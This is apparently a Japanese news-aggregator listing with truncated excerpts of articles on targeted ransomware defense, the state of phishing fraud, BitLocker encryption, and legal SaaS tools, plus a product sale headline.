昨今、話題になっている「ランサムウェア」という言葉は昔からありますが、2020年あたりから一般的新聞紙面にも度々登場するようになったと思います。データやシステムを暗号化という形で破壊し、復号の対価を要求するタイプのマルウェアという意味合いで登場しました。 ランサムウェアの対策では、バックアップを安全に保管することが強調されがちです。車の運転になぞらえれば、「車輪がパンクしても良いように、スペアタイヤを積載しておく」ことにあたるでしょうか。この対策は、確かに有効な施策のひとつではあるのですが、バックアップ偏重に代表される、「旧来のワーム型ランサム」をイメージした対策は、ミスリードになりつつあると私は感じています。 本稿では、ミスリードになっているように感じた理由と、ペネトレーションテストを実施してきた経験者から見た、現代的な標的型ランサムウェアに対して効果の高いネットワーク・セキュリティ対策
初めまして、金融犯罪対策センター(Financial Crime Control Center:以下、FC3)の佐野です。 フィッシングによる被害が近年急激に増加し、大きな脅威となっています。フィッシングとは、犯罪者が企業や組織を騙り、住所・電話番号等の個人情報やユーザID・パスワード等の認証情報を詐取しようとする詐欺です。私たちFC3は国内の金融犯罪被害の抑止のために活動しており、被害の拡大が続くフィッシング詐欺についても情報を収集しています。 本記事では、個人のサービス利用者を標的とした国内フィッシング詐欺の現状から高度化した新たな手口、そしてサービス提供者に求められる対策について解説します。 フィッシングの現状 フィッシングの発生状況 近年、フィッシングの報告件数が急増しています。以下の図はフィッシング対策協議会に寄せられたフィッシングの報告件数の推移を示したグラフです。 図1 フィ
BitLockerはWindowsパソコン内蔵のストレージを暗号化することで、盗難・紛失時の情報漏えいリスクを軽減する。管理者権限があれば無効化も可能だが、セキュリティリスクを踏まえ、常に有効にしておくことが推奨される。この記事では、BitLockerを無効化する手順を解説した上で、その他の暗号化の方法についても紹介する。 BitLockerとは BitLockerは、Windowsの主要なバージョンに標準で搭載されている。コンピューターに内蔵されたハードディスクやSSDといったストレージを暗号化し、その端末を盗難・紛失した際の情報漏えいリスクを抑制可能だ。 また、パソコン廃棄時の情報漏えいリスクを軽減できるのもBitLockerを利用するメリットの1つと言える。ハードディスクを廃棄する場合、物理的に破壊し、実質的に内部データへアクセスできなくする方法がある。一方、近年パソコンに搭載される
どっちが便利? 法務SaaS完全理解マニュアル クラウドサイン vs. DocuSign編:リーガルテック最前線(1/3 ページ) バックオフィスの中でもデジタル化が遅れていた法務部門。コロナ禍において、脱ハンコやリモートワークの動きが急激に加速したこともあって、近年リーガルテックと呼ばれる法務関連SaaSが盛り上がりを見せている。 ただし一口に「リーガルテック」と言っても、契約書の作成からレビュー、電子契約、そして保管など対応範囲は広く、それぞれの業務に特化したSaaSが次々と生まれている。 今回は電子契約、AI契約書レビュー、契約書の作成と管理の3つの分野で各2つ、合計6つのSaaSを取り上げる。 ITmedia NEWS「法務SaaS」に関する読者調査 当社では企業のビジネストレンドを明らかにするために読者調査を行っております。本アンケートのテーマは「法務SaaS」に関する読者調査で
モバイルバッテリーとは呼べない。「ほぼポタ電」なコレ1台で有事の時もアウトドアも大活躍!【AmazonスマイルSALE】
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く